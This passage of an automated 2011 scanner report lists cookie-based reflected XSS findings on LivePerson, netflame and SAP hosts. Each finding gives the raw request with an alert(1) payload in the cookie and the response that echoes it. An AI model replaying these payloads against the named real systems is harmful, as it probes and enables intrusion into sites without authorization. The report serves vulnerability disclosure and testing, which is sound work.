1.176. http://sales.liveperson.net/hc/37021986/ [HumanClickKEY cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/37021986/

Issue detail

The value of the HumanClickKEY cookie is copied into the HTML document as plain text between tags. The payload ed0e7<script>alert(1)</script>c595c19c2b8 was submitted in the HumanClickKEY cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /hc/37021986/?&visitor=5110247826455&site=37021986&cmd=mTagKnockPage&lpCallId=879271096083-522507778368&protV=20&lpjson=1&id=8356003372&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-estore-general-us-english-1%7ClpMTagConfig.db1%7ClpChatButton1%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/Locale.en_US/Currency.USD?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1321211190550
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8052586457831773007ed0e7<script>alert(1)</script>c595c19c2b8; HumanClickSiteContainerID_37021986=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1321206470853; ASPSESSIONIDQACACSDA=BKMLJANDIIIFOIPJJHMEEEFC; ASPSESSIONIDQCTQBCQR=JHHLGBNDAEJNODLMBEGGHIEF

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:07:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=8052586457831773007ed0e7<script>alert(1)</script>c595c19c2b8; path=/hc/37021986
Set-Cookie: HumanClickKEY=8052586457831773007ed0e7<script>alert(1)</script>c595c19c2b8; path=/hc/37021986
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 13 Nov 2011 19:07:58 GMT
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 35451

lpConnLib.Process({"ResultSet": {"lpCallId":"879271096083-522507778368","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
"code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='37021986-VID'; lpMTagConfig.FPC_VID='5110247826455'; lpMTagConfig.FPC_SKEY_NAME='37021986-SKEY'; lpMTagConfig.FPC_SKEY='8052586457831773007ed0e7<script>alert(1)</script>c595c19c2b8';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_37021986'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...

1.177. http://ssl-hints.netflame.cc/service/cookies.js/2104830679 [fcP.648765de68b1d3c7 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ssl-hints.netflame.cc
Path:   /service/cookies.js/2104830679

Issue detail

The value of the fcP.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e8cc'-alert(1)-'d54652d0072 was submitted in the fcP.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /service/cookies.js/2104830679?host=www.businessobjects.com HTTP/1.1
Host: ssl-hints.netflame.cc
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://store.businessobjects.com/store/bobjects/Content/pbPage.sap_countryselector?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1321211061712
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fcP.648765de68b1d3c7="C=0&T=1318689061488&DTO=1318689060945&U=2033968180&V=1318689193563"6e8cc'-alert(1)-'d54652d0072

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private,no-cache,must-revalidate
Expires: 0
Content-Type: application/x-javascript
Date: Sun, 13 Nov 2011 19:05:06 GMT
Content-Length: 475

fc3PCi=true;
function _fc_sc1(v,e){if(typeof(_fc_sc)=='undefined'){document.cookie=v+';path=/;expires='+e;}else{_fc_sc(v,e);}}
_fc_sc1('fcP="C=0&T=1318689061488&DTO=1318689060945&U=2033968180&V=1318689193563"6e8cc'-alert(1)-'d54652d0072','Wed,01-Jan-2020 00:00:01 GMT');
_fc_sc1('fcR=http%3A//www.sap.com/about-sap/company/ebc/index.epx');
_fc_sc1('fcC=X=C1072399659R1&Y=1321211066905&FV=10&H=1321211066421&fcTHR=store.businessobjects.
...[SNIP]...

1.178. http://ssl-hints.netflame.cc/service/cookies.js/35219521 [fcC.648765de68b1d3c7 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ssl-hints.netflame.cc
Path:   /service/cookies.js/35219521

Issue detail

The value of the fcC.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acb17'-alert(1)-'4c006192ad was submitted in the fcC.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /service/cookies.js/35219521?host=www.businessobjects.com HTTP/1.1
Host: ssl-hints.netflame.cc
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/Locale.en_US/Currency.USD?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1321211190550
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fcP.648765de68b1d3c7="C=1&T=1321211066905&DTO=1318689060945&U=2033968180&V=1321211259848"; fcR.648765de68b1d3c7="http%3A//www.sap.com/about-sap/company/ebc/index.epx"; fcC.648765de68b1d3c7="X=C1072399659R1&Y=1321211259949&FV=10&H=1321211259848&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=3&E=1702790&F=0"acb17'-alert(1)-'4c006192ad

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private,no-cache,must-revalidate
Expires: 0
Content-Type: application/x-javascript
Date: Sun, 13 Nov 2011 19:51:45 GMT
Content-Length: 488

fc3PCi=true;
function _fc_sc1(v,e){if(typeof(_fc_sc)=='undefined'){document.cookie=v+';path=/;expires='+e;}else{_fc_sc(v,e);}}
_fc_sc1('fcP=C=2&T=1321213806732&DTO=1318689060945&U=2033968180&V=13212
...[SNIP]...
R=http%3A//www.sap.com/about-sap/company/ebc/index.epx');
_fc_sc1('fcC="X=C1072399659R1&Y=1321211259949&FV=10&H=1321211259848&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=3&E=1702790&F=0"acb17'-alert(1)-'4c006192ad');

1.179. http://ssl-hints.netflame.cc/service/cookies.js/35219521 [fcP.648765de68b1d3c7 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ssl-hints.netflame.cc
Path:   /service/cookies.js/35219521

Issue detail

The value of the fcP.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df408'-alert(1)-'b17fbb93900 was submitted in the fcP.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /service/cookies.js/35219521?host=www.businessobjects.com HTTP/1.1
Host: ssl-hints.netflame.cc
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/Locale.en_US/Currency.USD?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1321211190550
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fcP.648765de68b1d3c7="C=1&T=1321211066905&DTO=1318689060945&U=2033968180&V=1321211259848"df408'-alert(1)-'b17fbb93900; fcR.648765de68b1d3c7="http%3A//www.sap.com/about-sap/company/ebc/index.epx"; fcC.648765de68b1d3c7="X=C1072399659R1&Y=1321211259949&FV=10&H=1321211259848&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=3&E=1702790&F=0"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private,no-cache,must-revalidate
Expires: 0
Content-Type: application/x-javascript
Date: Sun, 13 Nov 2011 19:51:45 GMT
Content-Length: 475

fc3PCi=true;
function _fc_sc1(v,e){if(typeof(_fc_sc)=='undefined'){document.cookie=v+';path=/;expires='+e;}else{_fc_sc(v,e);}}
_fc_sc1('fcP="C=1&T=1321211066905&DTO=1318689060945&U=2033968180&V=1321211259848"df408'-alert(1)-'b17fbb93900','Wed,01-Jan-2020 00:00:01 GMT');
_fc_sc1('fcR=http%3A//www.sap.com/about-sap/company/ebc/index.epx');
_fc_sc1('fcC=X=C1504844076R2&Y=1321213850980&FV=10&H=1321213848560&fcTHR=store.businessobjects.
...[SNIP]...

1.180. http://ssl-hints.netflame.cc/service/cookies.js/35219521 [fcR.648765de68b1d3c7 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ssl-hints.netflame.cc
Path:   /service/cookies.js/35219521

Issue detail

The value of the fcR.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2c31'-alert(1)-'85da044d06 was submitted in the fcR.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /service/cookies.js/35219521?host=www.businessobjects.com HTTP/1.1
Host: ssl-hints.netflame.cc
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/Locale.en_US/Currency.USD?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1321211190550
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fcP.648765de68b1d3c7="C=1&T=1321211066905&DTO=1318689060945&U=2033968180&V=1321211259848"; fcR.648765de68b1d3c7="http%3A//www.sap.com/about-sap/company/ebc/index.epx"b2c31'-alert(1)-'85da044d06; fcC.648765de68b1d3c7="X=C1072399659R1&Y=1321211259949&FV=10&H=1321211259848&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=3&E=1702790&F=0"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private,no-cache,must-revalidate
Expires: 0
Content-Type: application/x-javascript
Date: Sun, 13 Nov 2011 19:51:45 GMT
Content-Length: 474

fc3PCi=true;
function _fc_sc1(v,e){if(typeof(_fc_sc)=='undefined'){document.cookie=v+';path=/;expires='+e;}else{_fc_sc(v,e);}}
_fc_sc1('fcP=C=2&T=1321213806732&DTO=1318689060945&U=2033968180&V=1321213848560','Wed,01-Jan-2020 00:00:01 GMT');
_fc_sc1('fcR="http%3A//www.sap.com/about-sap/company/ebc/index.epx"b2c31'-alert(1)-'85da044d06');
_fc_sc1('fcC=X=C1504844076R2&Y=1321213850980&FV=10&H=1321213848560&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=1');

1.181. http://ssl-hints.netflame.cc/service/cookies.js/44128282 [fcC.648765de68b1d3c7 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ssl-hints.netflame.cc
Path:   /service/cookies.js/44128282

Issue detail

The value of the fcC.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e610'-alert(1)-'74497c02a87 was submitted in the fcC.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /service/cookies.js/44128282?host=www.businessobjects.com HTTP/1.1
Host: ssl-hints.netflame.cc
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://store.businessobjects.com/store/bobjects/Content/pbPage.sap_countryselector
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fcP.648765de68b1d3c7="C=2&T=1321213806732&DTO=1318689060945&U=2033968180&V=1321213804158"; fcR.648765de68b1d3c7="http%3A//www.sap.com/about-sap/company/ebc/index.epx"; fcC.648765de68b1d3c7="X=C1504844076R2&Y=1321213806732&FV=10&H=1321213804158&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=0"9e610'-alert(1)-'74497c02a87

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private,no-cache,must-revalidate
Expires: 0
Content-Type: application/x-javascript
Date: Sun, 13 Nov 2011 19:52:17 GMT
Content-Length: 475

fc3PCi=true;
function _fc_sc1(v,e){if(typeof(_fc_sc)=='undefined'){document.cookie=v+';path=/;expires='+e;}else{_fc_sc(v,e);}}
_fc_sc1('fcP=C=2&T=1321213806732&DTO=1318689060945&U=2033968180&V=13212
...[SNIP]...
;
_fc_sc1('fcR=http%3A//www.sap.com/about-sap/company/ebc/index.epx');
_fc_sc1('fcC="X=C1504844076R2&Y=1321213806732&FV=10&H=1321213804158&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=0"9e610'-alert(1)-'74497c02a87');

1.182. http://ssl-hints.netflame.cc/service/cookies.js/44128282 [fcP.648765de68b1d3c7 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ssl-hints.netflame.cc
Path:   /service/cookies.js/44128282

Issue detail

The value of the fcP.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93936'-alert(1)-'1110737f69 was submitted in the fcP.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /service/cookies.js/44128282?host=www.businessobjects.com HTTP/1.1
Host: ssl-hints.netflame.cc
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://store.businessobjects.com/store/bobjects/Content/pbPage.sap_countryselector
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fcP.648765de68b1d3c7="C=2&T=1321213806732&DTO=1318689060945&U=2033968180&V=1321213804158"93936'-alert(1)-'1110737f69; fcR.648765de68b1d3c7="http%3A//www.sap.com/about-sap/company/ebc/index.epx"; fcC.648765de68b1d3c7="X=C1504844076R2&Y=1321213806732&FV=10&H=1321213804158&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=0"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private,no-cache,must-revalidate
Expires: 0
Content-Type: application/x-javascript
Date: Sun, 13 Nov 2011 19:52:15 GMT
Content-Length: 474

fc3PCi=true;
function _fc_sc1(v,e){if(typeof(_fc_sc)=='undefined'){document.cookie=v+';path=/;expires='+e;}else{_fc_sc(v,e);}}
_fc_sc1('fcP="C=2&T=1321213806732&DTO=1318689060945&U=2033968180&V=1321213804158"93936'-alert(1)-'1110737f69','Wed,01-Jan-2020 00:00:01 GMT');
_fc_sc1('fcR=http%3A//www.sap.com/about-sap/company/ebc/index.epx');
_fc_sc1('fcC=X=C1504844076R2&Y=1321213850980&FV=10&H=1321213848560&fcTHR=store.businessobjects.
...[SNIP]...

1.183. http://ssl-hints.netflame.cc/service/cookies.js/44128282 [fcR.648765de68b1d3c7 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ssl-hints.netflame.cc
Path:   /service/cookies.js/44128282

Issue detail

The value of the fcR.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3e51'-alert(1)-'24e4270f356 was submitted in the fcR.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /service/cookies.js/44128282?host=www.businessobjects.com HTTP/1.1
Host: ssl-hints.netflame.cc
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://store.businessobjects.com/store/bobjects/Content/pbPage.sap_countryselector
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fcP.648765de68b1d3c7="C=2&T=1321213806732&DTO=1318689060945&U=2033968180&V=1321213804158"; fcR.648765de68b1d3c7="http%3A//www.sap.com/about-sap/company/ebc/index.epx"c3e51'-alert(1)-'24e4270f356; fcC.648765de68b1d3c7="X=C1504844076R2&Y=1321213806732&FV=10&H=1321213804158&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=0"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private,no-cache,must-revalidate
Expires: 0
Content-Type: application/x-javascript
Date: Sun, 13 Nov 2011 19:52:16 GMT
Content-Length: 475

fc3PCi=true;
function _fc_sc1(v,e){if(typeof(_fc_sc)=='undefined'){document.cookie=v+';path=/;expires='+e;}else{_fc_sc(v,e);}}
_fc_sc1('fcP=C=2&T=1321213806732&DTO=1318689060945&U=2033968180&V=1321213848560','Wed,01-Jan-2020 00:00:01 GMT');
_fc_sc1('fcR="http%3A//www.sap.com/about-sap/company/ebc/index.epx"c3e51'-alert(1)-'24e4270f356');
_fc_sc1('fcC=X=C1504844076R2&Y=1321213850980&FV=10&H=1321213848560&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=1');

1.184. https://www.sap.com/omni.epx [SAP.TTC cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /omni.epx

Issue detail

The value of the SAP.TTC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77350'-alert(1)-'2991cbf0eee was submitted in the SAP.TTC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /omni.epx HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/Locale.en_US/Currency.USD?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1321211190550
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjects%2fContent%2fpbPage.sap_countryselector%3fresid%3dTmOIUAoBAlUAAARDMJwAAAAN%26rests%3d1321211061712; mbox=session#1321210845752-117832#1321213045|check#true#1321211245; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=131868849377350'-alert(1)-'2991cbf0eee; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; 37021986-VID=5110247826455; 37021986-SKEY=8052586457831773007; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="CAO PSA OUR"
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; domain=.sap.com; expires=Tue, 12-Nov-2013 19:19:14 GMT; path=/
Set-Cookie: SAP.TTC=131868849377350'-alert(1)-'2991cbf0eee; domain=.sap.com; expires=Sat, 11-Feb-2012 19:19:14 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fDisplayHomePage%2fLocale.en_US%2fCurrency.USD%3fresid%3dTmOIUAoBAlUAAARDMJwAAAAN%26rests%3d1321211190550; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; domain=.sap.com; expires=Tue, 13-Nov-2012 19:19:14 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:19:13 GMT
Content-Length: 114

var omni_value = '6ed3d8c3-34dc-b9f4-1124-005f785589fd';
var omni_ttc = '131868849377350'-alert(1)-'2991cbf0eee';

Report generated by XSS.CX at Sun Nov 13 21:11:19 CST 2011.